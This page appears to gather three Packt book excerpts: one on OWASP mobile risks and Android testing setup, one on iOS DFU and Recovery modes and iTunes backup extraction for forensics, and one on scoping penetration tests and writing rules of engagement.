Injection vulnerabilities are the most common web vulnerabilities according to OWASP web top 10 dangerous risks. 
These are due to malformed inputs, which cause unintended action such as an alteration of database queries, command execution, and so on. In case of mobile applications, malformed inputs can be a serious threat at the local application level and server side as well (refer to M1: Weak server-side controls). Injections at a local application level, which mainly target data stores, may result in conditions such as access to paid content that's locked for trial users or file inclusions that may lead to an abuse of functionalities such as SMSes. M8: Security decisions via untrusted inputs: An implementation of certain functionalities such as the use of hidden variables to check authorization status can be bypassed by tampering them during the transit via web service calls or inter-process communication calls. This may lead to privilege escalations and unintended behavior of mobile applications. M9: Improper session handling: The application server sends back a session token on successful authentication with the mobile application. These session tokens are used by the mobile application to request for services. If these session tokens remain active for a longer duration and adversaries obtain them via malware or theft, the user account can be hijacked. M10: Lack of binary protection: A mobile application's source code is available to all. An attacker can reverse engineer the application and insert malicious code components and recompile them. If these tampered applications are installed by a user, they will be susceptible to data theft and may be the victims of unintended actions. Most applications do not ship with mechanisms such as checksum controls, which help in deducing whether the application is tampered or not. In 2015, there was another poll under the OWASP Mobile security group named the "umbrella project". This leads us to have M10 to M2, the trends look at binary protection to take over weak server-side controls. However, we will have wait until the final list for 2015. More details can be found at https://www.owasp.org/images/9/96/OWASP_Mobile_Top_Ten_2015_-_Final_Synthesis.pdf. Vulnerable applications to practice The open source community has been proactively designing plenty of mobile applications that can be utilized for practical tests. These are specifically designed to understand the OWASP top ten risks. Some of these applications are as follows: iMAS: iMAS is a collaborative research project initiated by the MITRE corporation (http://www.mitre.org/). This is for application developers and security researchers who would like to learn more about attack and defense techniques in iOS. More information about iMAS can be found at https://github.com/project-imas/about. GoatDroid: A simple functional mobile banking application for training with location tracking developed by Jack and Ken for Android application security is a great starting point for beginners. More information about GoatDroid can be found at https://github.com/jackMannino/OWASP-GoatDroid-Project. iGoat: The OWASP's iGOAT project is similar to the WebGoat web application framework. It's designed to improve the iOS assessment techniques for developers. More information on iGoat can be found at https://code.google.com/p/owasp-igoat/. Damn Vulnerable iOS Application (DVIA): DVIA is an iOS application that provides a platform for developers, testers, and security researchers to test their penetration testing skills. 
This application covers all the OWASP's top 10 mobile risks and also contains several challenges that one can solve and come up with custom solutions. More information on the Damn Vulnerable iOS Application can be found at http://damnvulnerableiosapp.com/. MobiSec: MobiSec is a live environment for the penetration testing of mobile environments. This framework provides devices, applications, and supporting infrastructure. It provides a great exercise for testers to view vulnerabilities from different points of view. More information on MobiSec can be found at http://sourceforge.net/p/mobisec/wiki/Home/. Android application sandboxing Android utilizes the well-established Linux protection ring model to isolate applications from each other. In Linux OS, assigning unique ID segregates every user. This ensures that there is no cross account data access. Similarly in Android OS, every app is assigned with its own unique ID and is run as a separate process. As a result, an application sandbox is formed at the kernel level, and the application will only be able to access the resources for which it is permitted to access. This subsequently ensures that the app does not breach its work boundaries and initiate any malicious activity. For example, the following screenshot provides an illustration of the sandbox mechanism: From the preceding Android Sandbox illustration, we can see how the unique Linux user ID created per application is validated every time a resource mapped to the app is accessed, thus ensuring a form of access control. Android Studio and SDK On May 16, 2013 at the Google I/O conference, an Integrated Development Environment (IDE) was released by Katherine Chou under Apache license 2.0; it was called Android Studio and it's used to develop apps on the Android platform. It entered the beta stage in 2014, and the first stable release was on December 2014 from Version 1.0 and it has been announced the official IDE on September 15, 2015. Information on Android Studio and SDK is available at http://developer.android.com/tools/studio/index.html#build-system. Android Studio and SDK heavily depends on the Java SE Development Kit. Java SE Development Kit can be downloaded at http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. Some developers prefer different IDEs such as eclipse. For them, Google only offers SDK downloads (http://dl.google.com/android/installer_r24.4.1-windows.exe). There are minimum system requirements that need to be fulfilled in order to install and use the Android Studio effectively. The following procedure is used to install the Android Studio on Windows 7 Professional 64-bit Operating System with 4 GB RAM, 500 Gig Hard Disk Space, and Java Development Kit 7 installed: Install the IDE available for Linux, Windows, and Mac OS X. Android Studio can be downloaded by visiting http://developer.android.com/sdk/index.html. Once the Android Studio is downloaded, run the installer file. By default, an installation window will be shown, as shown in the following screenshot. Click on Next: This setup will automatically check whether the system meets the requirements. Choose all the components that are required and click on Next. It is recommended to read and accept the license and click on Next. It is always recommended to create a new folder to install the tools that will help us track all the evidence in a single place. 
In this case, we have created a folder called Hackbox in C:, as shown in the following screenshot: Now, we can allocate the space required for the Android-accelerated environment, which will provide better performance. So, it is recommended to allocate a minimum of 2GB for this space. All the necessary files will be extracted to C:Hackbox. Once the installation is complete, you will be able to launch Android Studio, as shown in the following screenshot: Android SDK Android SDK provides developers with the ability to completely build, test, and debug apps that run on the Android platform. It has all the relevant software libraries, APIs, system images of the emulators, documentations, and other tools that help create an Android app. We have installed Android Studio with Android SDK. It is crucial to understand how to utilize the in-built SDK tools as much as possible. This section provides an overview of some of the critical tools that we will be using when attacking an Android app during the penetration testing activity. Emulator, simulators, and real devices Sometimes, we tend to believe that all virtual emulations work in exactly the same way in real devices, which is not really the case. Especially for Android, we have multiple OEMs manufacturing multiple devices, with different chipsets running different versions of Android. It would be challenge for developers to ensure that all the functionalities for the app reflect in the same way in all devices. It is very crucial to understand the difference between an emulator, simulator, and real devices. Simulators An objective of a simulator is to simulate the state of an object, which is exactly the same state as that of an object. It is preferable that the testing happens when a mobile interacts with some of the natural behavior of the available resources. These are reimplementations of the original software applications that are written, and they are difficult to debug and are mostly writing in high-level languages. Emulators Emulators predominantly aim at replicating the closest possible behavior of mobile devices. These are typically used to test a mobile's behavior internally, such as hardware, software, and firmware updates. These are typically written in machine-level languages and are easy to debug. This is again the reimplementation of the real software. Pros Fast, simple, and little or no price associated Emulators/simulators are quickly available to test the majority of the functionality of the app that is being developed It is very easy to find the defects using emulators and fix issues Cons The risk of false positives is increased; some of the functions or protection may actually not work on a real device. Differences in software and hardware will arise. Some of the emulators might be able to mimic the hardware. However, it may or may not work when it is actually installed on that particular hardware in reality. There's a lack of network interoperability. Since emulators are not really connected to a Wi-Fi or cellular network, it may not be possible to test network-based risks/functions. Real devices Real devices are physical devices that a user will be interacting with. There are pros and cons of real devices too. 
Pros Lesser false positives: Results are accurate Interoperability: All the test cases are on a live environment User experience: Real user experience when it comes to the CPU utilization, memory, and so on for a provided device Performance: Performance issues can be found quickly with real handsets Cons Costs: There are plenty of OEMs, and buying all the devices is not viable. A slowdown in development: It may not be possible to connect an IDE and than emulators. This will significantly slow down the development process. Other issues: The devices that are locally connected to the workstation will have to ensure that USB ports are open, thus opening an additional entry point. Threats A threat is something that can harm an asset that we are trying to protect. In mobile device security, a threat is a possible danger that might exploit a vulnerability to compromise and cause potential harm to a device. A threat can be defined by the motives; it can be any of the following ones: Intentional: An individual or a group with an aim to break an application and steal information Accidental: The malfunctioning of a device or an application may lead to a potential disclosure of sensitive information Others: Capabilities, circumstantial, and so on Threat agents A threat agent is used to indicate an individual or a group that can manifest a threat. Threat agents will be able to perform the following actions: Access Misuse Disclose Modify Deny access Vulnerability The security weakness within a system that might allow attackers to exploit it and break the security of the device is called a vulnerability. For example, if a mobile device is stolen and it does not have the PIN or pass code enabled, the phone is vulnerable to data theft. Risk The intersection between asset (A), threat (T), and vulnerability (V) is a risk. However, a risk can be included along with the probability (P) of the threat occurrences to provide more value to the business. Risk = A x T x V x P These terms will help us understand the real risk to a given asset. Business will be benefited only if these risks are accurately assessed. Understanding threat, vulnerability, and risk is the first step in threat modeling. For a given application, no vulnerabilities or a vulnerability with no threats is considered to be a low risk. Summary In this article, we saw that mobile devices are susceptible to attacks through various threats, which exist due to the lack of sufficient security measures that can be implemented at various stages of the development of a mobile application. It is necessary to understand how these threats are manifested and learn how to test and mitigate them effectively. Proper knowledge of the underlying architecture and the tools available for the testing of mobile applications will help developers and security testers alike in order to protect end users from attackers who may be attempting to leverage these vulnerabilities.
Read more
  • 0
  • 0
  • 3197
article-image-forensics-recovery
Packt
05 Jan 2016
6 min read
Save for later

Forensics Recovery

Packt
05 Jan 2016
6 min read
In this article by Bhanu Birani and Mayank Birani, the authors of the book, IOS Forensics Cookbook, we have discussed Forensics recovery; also, how it is important, when in some investigation cases there is a need of decrypting the information from the iOS devices. These devices are in an encrypted form usually. In this article, we will focus on various tools and scripts, which can be used to read the data from the devices under investigation. We are going to cover the following topics: DFU and Recovery mode Extracting iTunes backup (For more resources related to this topic, see here.) DFU and Recovery Mode In this section we'll cover both the DFU mode and the Recovery mode separately. DFU mode In this section, we will see how to launch the DFU mode, but before that we see what DFU means. DFU stands for Device Firmware Upgrade, which means this mode is used specifically while iOS upgrades. This is a mode where device can be connected with iTunes and still do not load iBoot boot loader. Your device screen will be completely black in DFU mode because neither the boot loader nor the operating system is loaded. DFU bypasses the iBoot so that you can downgrade your device. How to do it... We need to follow these steps in order to launch a device in DFU mode: Turn off your device. Connect your device to the computer. Press your Home button and the Power button, together, for 10 seconds. Now, release the Power button and keep holding the Home button till your computer detects the device that is connected. After sometime, iTunes should detect your device. Make sure that your phone does not show any Restore logo on the device, if it does, then you are in Recovery mode, not in DFU. Once your DFU operations are done, you can hold the Power and Home buttons till you see the Apple logo in order to return to the normal functioning device. This is the easiest way to recover a device from a faulty backup file. Recovery mode In this section, you will learn about the Recovery mode of our iOS devices. To dive deep into the Recovery mode, we fist need to understand a few basics such as which boot loader is been used by iOS devices, how the boot takes place, and so on. We will explore all such concepts in order to simplify the understanding of the Recovery mode. All iOS devices use the iBoot boot loader in order to load the operating systems. The iBoot's state, which is used for recovery and restore purposes, is called Recovery mode. iOS cannot be downgraded in this state as the iBoot is loaded. iBoot also prevents any other custom firmware to flash into device unless it is a jailbreak, that is, "pwned". How to do it... The following are the detailed steps to launch the Recovery mode on any iOS device: You need to turn off your iOS device in order to launch the Recovery mode. Disconnect all the cables from the device and remove it from the dock if it is connected. Now, while holding the Home button, connect your iOS device to the computer using the cable. Hold the Home button till you see the Connect to iTunes screen. Once you see the screen, you have entered the Recovery mode. Now you will receive a popup in your Mac saying "iTunes has detected your iDevice in recovery mode". Now you can use iTunes to restore the device in the Recovery mode. Make sure your data is backed up because the recovery will restore the device to Factory Settings. You can later restore from the backup as well. Once your Recovery mode operations are complete, you will need to escape from the Recovery mode. 
To escape, just press the power button and the home button concurrently for 10-12 seconds. Extracting iTunes backup Extracting the logical information from the iTunes backup is crucial for forensics investigation. There is a full stack of tools available for extracting data from the iTunes backup. They come in a wide variety, distributed from open source to paid tools. Some of these forensic tools are Oxygen Forensics Suite, Access Data MPE+, EnCase, iBackup Bot, DiskAid, and so on. The famous open source tools are iPhone backup analyzer and iPhone analyzer. In this section, we are going to learn how to use the iPhone backup extractor tools. How to do it... The iPhone backup extractor is an open source forensic tool, which can extract information from device backups. However, there is one constraint that the backup should be created from iTunes 10 onwards. Follow these steps to extract data from iTunes backup: Download the iPhone backup extractor from http://supercrazyawesome.com/. Make sure that all your iTunes backup is located at this directory: ~/Library/ApplicationSupports/MobileSync/Backup. In case you don't have the required backup at this location, you can also copy paste it. The application will prompt after it is launched. The prompt should look similar to the following screenshot: Now tap on the Read Backups button to read the backup available at ~/Library/ApplicationSupports/MobileSync/Backup. Now, you can choose any option as shown here: This tool also allows you to extract data for an individual application and enables you to read the iOS file system backup. Now, you can select the file you want to extract. Once the file is selected, click on Extract. You will be get a popup asking for the destination directory. This complete process should look similar to the following screenshot: There are various other tools similar to this; iPhone Backup Browser is one of them, where you can view your decrypted data stored in your backup files. This tool supports only Windows operating system as of now. You can download this software from http://code.google.com/p/iphonebackupbrowser/. Summary In this article, we covered how to launch the DFU and the DFU and the Recovery modes. We also learned to extract the logical information from the iTunes backup using the iPhone backup extractor tool. Resources for Article: Further resources on this subject: Signing up to be an iOS developer [article] Exploring Swift [article] Introduction to GameMaker: Studio [article]
Read more
  • 0
  • 0
  • 4295

article-image-assessment-planning
Packt
04 Jan 2016
12 min read
Save for later

Assessment Planning

Packt
04 Jan 2016
12 min read
In this article by Kevin Cardwell the author of the book Advanced Penetration Testing for Highly-Secured Environments - Second Edition, discusses the test environment and how we have selected the chosen platform. We will discuss the following: Introduction to advanced penetration testing How to successfully scope your testing (For more resources related to this topic, see here.) Introduction to advanced penetration testing Penetration testing is necessary to determine the true attack footprint of your environment. It may often be confused with vulnerability assessment and thus it is important that the differences should be fully explained to your clients. Vulnerability assessments Vulnerability assessments are necessary for discovering potential vulnerabilities throughout the environment. There are many tools available that automate this process so that even an inexperienced security professional or administrator can effectively determine the security posture of their environment. Depending on scope, additional manual testing may also be required. Full exploitation of systems and services is not generally in scope for a normal vulnerability assessment engagement. Systems are typically enumerated and evaluated for vulnerabilities, and testing can often be done with or without authentication. Most vulnerability management and scanning solutions provide actionable reports that detail mitigation strategies such as applying missing patches, or correcting insecure system configurations. Penetration testing Penetration testing expands upon vulnerability assessment efforts by introducing exploitation into the mix The risk of accidentally causing an unintentional denial of service or other outage is moderately higher when conducting a penetration test than it is when conducting vulnerability assessments. To an extent, this can be mitigated by proper planning, and a solid understanding of the technologies involved during the testing process. Thus, it is important that the penetration tester continually updates and refines the necessary skills. Penetration testing allows the business to understand if the mitigation strategies employed are actually working as expected; it essentially takes the guesswork out of the equation. The penetration tester will be expected to emulate the actions that an attacker would attempt and will be challenged with proving that they were able to compromise the critical systems targeted. The most successful penetration tests result in the penetration tester being able to prove without a doubt that the vulnerabilities that are found will lead to a significant loss of revenue unless properly addressed. Think of the impact that you would have if you could prove to the client that practically anyone in the world has easy access to their most confidential information! Penetration testing requires a higher skill level than is needed for vulnerability analysis. This generally means that the price of a penetration test will be much higher than that of a vulnerability analysis. If you are unable to penetrate the network you will be ensuring your clientele that their systems are secure to the best of your knowledge. If you want to be able to sleep soundly at night, I recommend that you go above and beyond in verifying the security of your clients. Advanced penetration testing Some environments will be more secured than others. 
You will be faced with environments that use: Effective patch management procedures Managed system configuration hardening policies Multi-layered DMZ's Centralized security log management Host-based security controls Network intrusion detection or prevention systems Wireless intrusion detection or prevention systems Web application intrusion detection or prevention systems Effective use of these controls increases the difficulty level of a penetration test significantly. Clients need to have complete confidence that these security mechanisms and procedures are able to protect the integrity, confidentiality, and availability of their systems. They also need to understand that at times the reason an attacker is able to compromise a system is due to configuration errors, or poorly designed IT architecture. Note that there is no such thing as a panacea in security. As penetration testers, it is our duty to look at all angles of the problem and make the client aware of anything that allows an attacker to adversely affect their business. Advanced penetration testing goes above and beyond standard penetration testing by taking advantage of the latest security research and exploitation methods available. The goal should be to prove that sensitive data and systems are protected even from a targeted attack, and if that is not the case, to ensure that the client is provided with the proper instruction on what needs to be changed to make it so. A penetration test is a snapshot of the current security posture. Penetration testing should be performed on a continual basis. Many exploitation methods are poorly documented, frequently hard to use, and require hands-on experience to effectively and efficiently execute. At DefCon 19 Bruce "Grymoire" Barnett provided an excellent presentation on "Deceptive Hacking". In this presentation, he discussed how hackers use many of the very same techniques used by magicians. This is exactly the tenacity that penetration testers must assume as well. Only through dedication, effort, practice, and the willingness to explore unknown areas will penetration testers be able to mimic the targeted attack types that a malicious hacker would attempt in the wild. Often times you will be required to work on these penetration tests as part of a team and will need to know how to use the tools that are available to make this process more endurable and efficient. This is yet another challenge presented to today's pentesters. Working in a silo is just not an option when your scope restricts you to a very limited testing period. In some situations, companies may use non-standard methods of securing their data, which makes your job even more difficult. The complexity of their security systems working in tandem with each other may actually be the weakest link in their security strategy. The likelihood of finding exploitable vulnerabilities is directly proportional to the complexity of the environment being tested. Before testing begins Before we commence with testing, there are requirements that must be taken into consideration. You will need to determine the proper scoping of the test, timeframes and restrictions, the type of testing (Whitebox, Blackbox), and how to deal with third-party equipment and IP space. Determining scope Before you can accurately determine the scope of the test, you will need to gather as much information as possible. It is critical that the following is fully understood prior to starting testing procedures: Who has the authority to authorize testing? 
What is the purpose of the test? What is the proposed timeframe for the testing? Are there any restrictions as to when the testing can be performed? Does your customer understand the difference between a vulnerability assessment and a penetration test? Will you be conducting this test with, or without cooperation of the IT Security Operations Team? Are you testing their effectiveness? Is social engineering permitted? How about denial-of-service attacks? Are you able to test physical security measures used to secure servers, critical data storage, or anything else that requires physical access? For example, lock picking, impersonating an employee to gain entry into a building, or just generally walking into areas that the average unaffiliated person should not have access to. Are you allowed to see the network documentation or to be informed of the network architecture prior to testing to speed things along? (Not necessarily recommended as this may instill doubt for the value of your findings. Most businesses do not expect this to be easy information to determine on your own.) What are the IP ranges that you are allowed to test against? There are laws against scanning and testing systems without proper permissions. Be extremely diligent when ensuring that these devices and ranges actually belong to your client or you may be in danger of facing legal ramifications. What are the physical locations of the company? This is more valuable to you as a tester if social engineering is permitted because it ensures that you are at the sanctioned buildings when testing. If time permits, you should let your clients know if you were able to access any of this information publicly in case they were under the impression that their locations were secret or difficult to find. What to do if there is a problem or if the initial goal of the test has been reached. Will you continue to test to find more entries or is the testing over? This part is critical and ties into the question of why the customer wants a penetration test in the first place. Are there legal implications that you need to be aware of such as systems that are in different countries, and so on? Not all countries have the same laws when it comes to penetration testing. Will additional permission be required once a vulnerability has been exploited? This is important when performing tests on segmented networks. The client may not be aware that you can use internal systems as pivot points to delve deeper within their network. How are databases to be handled? Are you allowed to add records, users, and so on? This listing is not all-inclusive and you may need to add items to the list depending on the requirements of your clients. Much of this data can be gathered directly from the client, but some will have to be handled by your team. If there are legal concerns, it is recommended that you seek legal counsel to ensure you fully understand the implications of your testing. It is better to have too much information than not enough, once the time comes to begin testing. In any case, you should always verify for yourself that the information you have been given is accurate. You do not want to find out that the systems you have been accessing do not actually fall under the authority of the client! It is of utmost importance to gain proper authorization in writing before accessing any of your clients systems. Failure to do so may result in legal action and possibly jail. Use proper judgment! 
You should also consider that errors and omissions insurance is a necessity when performing penetration testing. Setting limits–nothing lasts forever Setting proper limitations is essential if you want to be successful at performing penetration testing. Your clients need to understand the full ramifications involved, and should be made aware of any residual costs incurred, if additional services beyond those listed within the contract are needed. Be sure to set defined start and end dates for your services. Clearly define the rules of engagement and include IP ranges, buildings, hours, and so on that may need to be tested. If it is not in your rules of engagement documentation, it should not be tested. Meetings should be predefined prior to the start of testing, and the customer should know exactly what your deliverables will be. Rules of engagement documentation Every penetration test will need to start with a rules of engagement document that all involved parties must have. This document should at a minimum cover several items: Proper permissions by appropriate personnel. Begin and end dates for your testing. The type of testing that will be performed. Limitations of testing. What type of testing is permitted? DDOS? Full penetration? Social engineering? These questions need to be addressed in detail. Can intrusive tests as well as unobtrusive testing be performed? Does your client expect cleanup to be performed afterwards or is this a stage environment that will be completely rebuilt after testing has been completed? IP ranges and physical locations to be tested. How the report will be transmitted at the end of the test? (Use secure means of transmission!) Which tools will be used during the test? Do not limit yourself to only one specific tool; it may be beneficial to provide a list of the primary toolset to avoid confusion in the future. For example, we will use the tools found in the most recent edition of the Kali Suite. Let your client know how any illegal data that is found during testing would be handled: law enforcement should be contacted prior to the client. Please be sure to understand fully the laws in this regard before conducting your test. How sensitive information will be handled: you should not be downloading sensitive customer information; there are other methods of proving that the clients' data is not secured. This is especially important when regulated data is a concern. Important contact information for both your team and for the key employees of the company you are testing. An agreement of what you will do to ensure the customer's system information does not remain on unsecured laptops and desktops used during testing. Will you need to properly scrub your machine after this testing? What do you plan to do with the information you gathered? Is it to be kept somewhere for future testing? Make sure this has been addressed before you start testing, not after. The rules of engagement should contain all the details that are needed to determine the scope of the assessment. Any questions should have been answered prior to drafting your rules of engagement to ensure there are no misunderstandings once the time comes to test. Your team members need to keep a copy of this signed document on their person at all times when performing the test. Imagine you have been hired to assert the security posture of a client's wireless network and you are stealthily creeping along the parking lot on private property with your gigantic directional Wi-Fi antenna and a laptop. 
If someone witnesses you in this act, they will probably be concerned and call the authorities. You will need to have something on you that documents you have a legitimate reason to be there. This is one time where having the contact information of the business leaders that hired you will come in extremely handy! Summary In this article, we focused on all that is necessary to prepare and plan for a successful penetration test. We discussed the differences between penetration testing and vulnerability assessments. The steps involved with proper scoping were detailed, as were the necessary steps to ensure all information has been gathered prior to testing. One thing to remember is that proper scoping and planning is just as important as ensuring you test against the latest and greatest vulnerabilities. Resources for Article: Further resources on this subject: Penetration Testing[article] Penetration Testing and Setup[article] BackTrack 4: Security with Penetration Testing Methodology[article]
Read more
  • 0
  • 0
  • 2772